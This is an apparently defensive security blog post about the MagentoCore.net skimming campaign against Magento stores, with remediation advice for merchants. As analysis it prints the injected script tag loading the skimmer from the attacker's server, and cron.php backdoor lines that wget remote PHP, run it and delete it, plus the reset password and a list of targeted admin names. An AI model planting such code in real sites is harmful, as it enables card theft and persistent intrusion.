A single group is responsible for planting skimmers on 7339 individual stores in the last 6 months. The MagentoCore skimmer is now the most successful to date.
Update 2018-09-07: Because Google Chrome has added the campaign to its blocklist last Saturday, the skimmers are now rapidly replacing "magentocore.net" with "magento.name". In the last 24h, they have updated at least 190 compromised stores.
Online skimming - your identity and card are stolen while you shop - has been around for a few years, but no campaign has been so prolific as the MagentoCore.net skimmer. In the last 6 months, the group has turned 7339 individual stores into zombie money machines, to the benefit of their illustrious masters.
The average recovery time is a few weeks, but at least 1450 stores have hosted the MagentoCore.net parasite during the full past 6 months.
The group hasn't finished yet: new brands are hijacked at a pace of 50 to 60 stores per day over the last two weeks, according to Sansec crawler data.
The victim list contains multi-million dollar, publicly traded companies, which suggests the malware operators make a handsome profit. But the real victims are eventually the customers, who have their card and identity stolen.
How it works
The MagentoCore skimmers gain illicit access to the control panel of an e-commerce site, often with brute force techniques (automatically trying lots of passwords, sometimes for months). Once they succeed, an embedded piece of Javascript is added to the HTML template:
<script
type="text/javascript"
src="https://magentocore.net/mage/mage.js"
></script>
This script (backup) records keystrokes from unsuspecting customers and sends everything in real-time to the "magentocore.net" server, registered in Moscow.
The malware includes a recovery mechanism as well. In case of the Magento software, it adds a backdoor to cron.php. That will periodically download malicious code, and, after running, delete itself, so no traces are left.
shell_exec("wget -c https://magentocore.net/clean.json -O ./app/code/core/clean.php 2>&1");
shell_exec("wget -c https://magentocore.net/clear.json -O ./app/code/core/clear.php 2>&1");
shell_exec("php ./app/code/core/clean.php 2>&1");
shell_exec("php ./app/code/core/clear.php 2>&1");
unlink('./app/code/core/clean.php');
unlink('./app/code/core/clear.php');
The file clean.json (backup) is PHP code that removes any competing malware from the site, searching for ATMZOW, 19303817.js and PZ7SKD.
The file clear.json (backup) changes the password of several common staff user names to how1are2you3 (see below for list).
What you can do
If you are a merchant and found the MagentoCore.net skimmer in your store, this is the to-do list for your ops team / forensic investigator.
- Find the entry point: how could attackers gain unauthorized access in the first place? Analyse backend access logs, correlate with staff IP's and typical working hours. If suspicious activity is recorded from staff IPs, it could be that a staff computer is infected with malware, or that the attacker has hijacked an authorized session.
- Find backdoors and unauthorized changes to your codebase. Usually there are a few, both in frontend/backend code and the database. My opensource Magento Malware Scanner can be useful here.
- Once you have established all means of unauthorized access, close them all at once.
- Remove the skimmer, backdoors and other code. Revert to a certified safe copy of the codebase, if possible. Malware is often hidden in default HTML header/footers, but also in minimized, static Javascript files, hidden in deep in the codebase. You should check all HTML/JS assets that are loaded during the checkout process.
- Implement secure procedures that cover timely patching, strong staff passwords etcetera. A good starting point.
If your team has little experience with forensic analysis, it generally pays off to hire a professional investigator. S/he will find the entry vector faster and perhaps more important, has a lower risk of leaving any undetected backdoors. One missed backdoor and you can start all over in a few weeks.
Admin user names
The MagentoCore malware will set the password to how1are2you3 for the following admin accounts periodically:
1468177885 1470303373 a aborman acid admin01
admin1 admin123 admin5 adminhendra adminnew adminray
admins adminu admin_bfei admin_ihfb afletcher ajen
alexgvn123 alif ameendering Ameliaaa an anin48
anjeng anjeng12 Anr_01 ardyan as asdasd
astroeh asu123 asuasu asulan123 Audi azer
aziz Backup backup_35f69 badcc bangsat berandal
bgades bgross biji bschlotter bwilson c0krek
cahyodp camuv1653 casa cbaker cecun cevans
cgcf cgreenfield cknobloch clayser ClayX404 cmorgan
coco codex coq cruis cvanstryland cwarton
d dalexander ddoine Death dede dedeganteng
default123 defaults defaults01 defaut123 design developer
dhsjcsc diablox Dian2206 dkelly dlc dmorgan
dpender dsacks dstefan eCommerce edorr ehooser
einlow ejameson ekennedy erik erobinson [email protected]
family faqih212 FathurFreakz ferdi123 fikrihaikal3 forme
frozen404 fwilde geizkayusuf gfd ggrav ghaz
gigihmhd gladz gmr golix19 GolixGates1 google
gustaman haydar haydra hell hiddenymouz hornetto
hunter2 hydro Hysoka i ibizta iko
indoxploit iniadmin irfan jaja jancok jancoks
janderson jayzweed jbonnell jdragovich jefri JelexCrew
jengel jhemphill jhogan jhult jmartin jockerdz
jonson jtappe juancok katon kedaong kehise
kenta khise khoogers kimak kimyounsin king
kkruger kmagnan knap13 knelson Kontol900! kotack
kuyas kwwilliams kwynia lalapo123 LastTouch lluethje
localsystem Loic lthummagunta lucu m4tr1x madmax
maganeto magento magento1 mageplas magsupport malang
manggo manick masthio01 mcopa meldred Memekl3g17
mgonzalez mind mlaudenbach mlomo momo moza
mperry mranupak mrsakso msas msf msivalingam
mtrudell mturico mwaldner mwelbig mwendt nathan
nbrouwer ncastelli neqyns13 ngentod ngentot123 nmccray
nnordman noob novara nrussell nzero o
omyo123 ouni owadmin pak paypal pbk7695K@
penggunalaya pikri policy pujasucipto putra7695K r0cky
rami rctioke7 rcummings rdewolfe restuser revian29
rezafirdaus rezafirdaus2 rhaan Rieqy rieqyns13 rkm48
rmiller robert Root rseeker s sadmin
samikom sav.admin saz sdunham semprol sgood
sgoodman shansen shayer sheinz25 Shor7cut Sihdaunix
sjohnson slackerc0de slamusga smolix soliro ss123
staff.develo stores stupid Support surya surya1
svandenheuve swhite sysadm sysadmiin sysadmin sysadmin1
sysmon system32 systemadmin systembackup T1KUS90T tadamec
tae tamedeo tanderson task teastmond telgersma
terserah tesdar test tfgh Thole129 tomhawk
training tvanhouten ubehera ui upel666 uSer
VHiden133 vpotter wajixz wawa wew ybickham
youmisscry ywigaraa zadmin zaz ziko zxc
zxcyou636 _admin gogle Nexcess
Further reading
- Burner domain "magentocore.net" added to the Magento Malware Scanner repository on Feb 19th this year.
- Estonian blog, Aug 1st, by Peeter Marvet